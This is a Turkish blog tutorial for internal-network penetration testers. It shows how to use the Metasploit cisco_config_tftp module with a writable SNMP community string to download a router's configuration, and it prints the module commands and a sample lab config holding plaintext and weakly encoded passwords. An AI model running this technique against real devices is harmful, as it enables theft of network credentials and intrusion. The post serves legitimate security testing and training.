MSF cisco_config_tftp Auxiliary Modülü Kullanılarak İç Ağ Sızma Testlerinde Switch ve Router Gibi Aktif Cihazlara Ait Konfigürasyon Dosyalarının Elde Edilmesi

İç ağ sızma testlerinde saldırı hedeflerinden birisi ağdaki 2. katmanda çalışan Switch gibi ve 3. katmanda çalışan Router gibi aktif cihazlara ait konfigürasyon dosyalarının elde edilmesidir. Bu yazıda, iç ağda bulunan Switch/Router gibi cihazlara ait konfigürasyon dosyasının MSF cisco_config_tftp auxiliary modülü ile elde edilmesi incelenecektir.

Not: Günümüzde sadece 2. katmanda çalışan ve Switch görevi gören cihazlara pek fazla rastlanmamaktadır. Bu sebeple, yazının devamında geçen Router olarak ifadeler Switch için de geçerlidir.

İç ağda yazma yetkisine sahip topluluk ismi “private” olarak tespit edilen 192.168.0.200 IP adresli Router hedef olarak MSF cisco_config_tftp auxiliary modülüne verilebilir. Bu amaçla, modül seçilir ve seçenekleri incelenir.

search cisco_config_tftp
use auxiliary/scanner/snmp/cisco_config_tftp
show options

obtaining-configuration-file-of-active-devices-such-as-switch-or-router-by-using-msf-cisco-config-tftp-auxiliary-module-01

Modüle IP adresi, topluluk ismi ve konfigürasyon dosyasının kaydedileceği dizin verilerek modül seçenekleri ayarlanabilir.

set RHOSTS 192.168.0.200
set COMMUNITY private
set OUTPUTDIR /root/Desktop
show options

obtaining-configuration-file-of-active-devices-such-as-switch-or-router-by-using-msf-cisco-config-tftp-auxiliary-module-02

Seçenekler ayarlandırıldıktan sonra modül çalıştırılabilir. OUTPUTDIR seçeneği ile belirtilen dizine konfigürasyon dosyasının kaydedildiğine dair bir çıktı elde edilir.

exploit

obtaining-configuration-file-of-active-devices-such-as-switch-or-router-by-using-msf-cisco-config-tftp-auxiliary-module-03

Not: SNMP, UDP üzerinden çalıştığı için konfigürasyon dosyası hemen gelmeyebilir, hata mesajı alınabilir. Bu durumda, işlemi bir kaç kere tekrar etmek gerekebilir veya RETRIES seçeneği ayarlanabilir.

Konfigürasyon dosyasının içeriği aşağıdaki gibidir:

obtaining-configuration-file-of-active-devices-such-as-switch-or-router-by-using-msf-cisco-config-tftp-auxiliary-module-04

Dosya içeriği özetle aşağıdaki gibidir:

no service password-encryption
!
hostname Router
!
enable password en
!
username cisco privilege 0 password 0 cisco123
username root privilege 15 password 7 0236054818115F33480f
!
interface Ethernet0/0
ip address 192.168.0.200 255.255.255.0
ip access-group 150 in
half-duplex
!
interface Ethernet0/1
ip address 10.0.0.200 255.255.255.0
half-duplex
!
interface Ethernet0/2
no ip address
shutdown
half-duplex
!
interface Ethernet0/3
no ip address
shutdown
half-duplex
!
ip http server
no ip http secure-server
!
access-list 150 deny ip 192.168.0.0 0.0.0.255 10.0.0.0 0.0.0.255
access-list 150 permit ip any any
snmp-server community private RW
snmp-server community public RO
snmp-server contact HASH(0x90b3d28)
!
line con 0
line aux 0
line vty 0 4
privilege level 15
login local
transport input telnet
!
end

 

Yazarın Bilgileri

Ertuğrul BAŞARANOĞLU
Ertuğrul BAŞARANOĞLU

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir

Kullanabileceğiniz HTLM etiketleri ve özellikleri: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code class="" title="" data-url=""> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong> <pre class="" title="" data-url=""> <span class="" title="" data-url="">

Bu sayfada incelenen konulardan doğacak sorunlar kişinin kendi sorumluluğundadır.